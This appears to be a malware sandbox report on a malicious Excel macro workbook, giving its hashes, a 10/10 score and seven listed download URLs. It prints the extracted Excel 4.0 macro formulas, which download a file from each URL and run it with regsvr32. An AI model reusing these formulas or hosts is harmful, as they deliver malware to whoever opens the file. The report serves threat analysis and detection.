Overview

overview

10

Static

static

10

3de6e152fb...0.xlsm

windows7-x64

10

3de6e152fb...0.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    3de6e152fbe4de6db133082ce82a68cba9d5c7cc48a51caba755a9441d0fc2c0

  • Size

    35KB

  • Sample

    241120-mgsfnazndk

  • MD5

    fb5bfafec7ad3aceae2ab864c5f42fe1

  • SHA1

    c570d2f2d933a27fe02a0c2b5416a0dae1011c84

  • SHA256

    3de6e152fbe4de6db133082ce82a68cba9d5c7cc48a51caba755a9441d0fc2c0

  • SHA512

    01cb93465b941ea8b98f53eafa6b70ef41d41ddde6ab867e42979e21c5d0222f8e763a306bb19232d2256a31f066898fb4a627db28e9a208ee49a9ee9abe945d

  • SSDEEP

    768:qYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:qYKtmg+UOZZ1ZYpoQ/pMAm

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://casinojackpotking.com/cgi-bin/47sKbklSQf31/

https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/

https://directorkay.com.ng/wp-admin/MYP3NA/

https://deatravel.al/wp-includes/H544R/

https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/

https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/

https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://casinojackpotking.com/cgi-bin/47sKbklSQf31/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://directorkay.com.ng/wp-admin/MYP3NA/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deatravel.al/wp-includes/H544R/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://casinojackpotking.com/cgi-bin/47sKbklSQf31/
xlm40.dropper

https://dentaltogether.com/wp-content/YNscIH7jpwh9twPhWol/
xlm40.dropper

https://directorkay.com.ng/wp-admin/MYP3NA/
xlm40.dropper

https://deatravel.al/wp-includes/H544R/
xlm40.dropper

https://rizwansulehria.com/cgi-bin/HfRbJzbrgq/
xlm40.dropper

https://rassti.com/Fox-SS/uJKpjP0kSfDQtFBw/
xlm40.dropper

https://www.mv-burgenland.at/wp-admin/Rc9nuJgma/

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://casinojackpotking.com/cgi-bin/47sKbklSQf31/

Targets

    • Target

      3de6e152fbe4de6db133082ce82a68cba9d5c7cc48a51caba755a9441d0fc2c0

    • Size

      35KB

    • MD5

      fb5bfafec7ad3aceae2ab864c5f42fe1

    • SHA1

      c570d2f2d933a27fe02a0c2b5416a0dae1011c84

    • SHA256

      3de6e152fbe4de6db133082ce82a68cba9d5c7cc48a51caba755a9441d0fc2c0

    • SHA512

      01cb93465b941ea8b98f53eafa6b70ef41d41ddde6ab867e42979e21c5d0222f8e763a306bb19232d2256a31f066898fb4a627db28e9a208ee49a9ee9abe945d

    • SSDEEP

      768:qYKtm5eMn7AjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooXLR:qYKtmg+UOZZ1ZYpoQ/pMAm

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks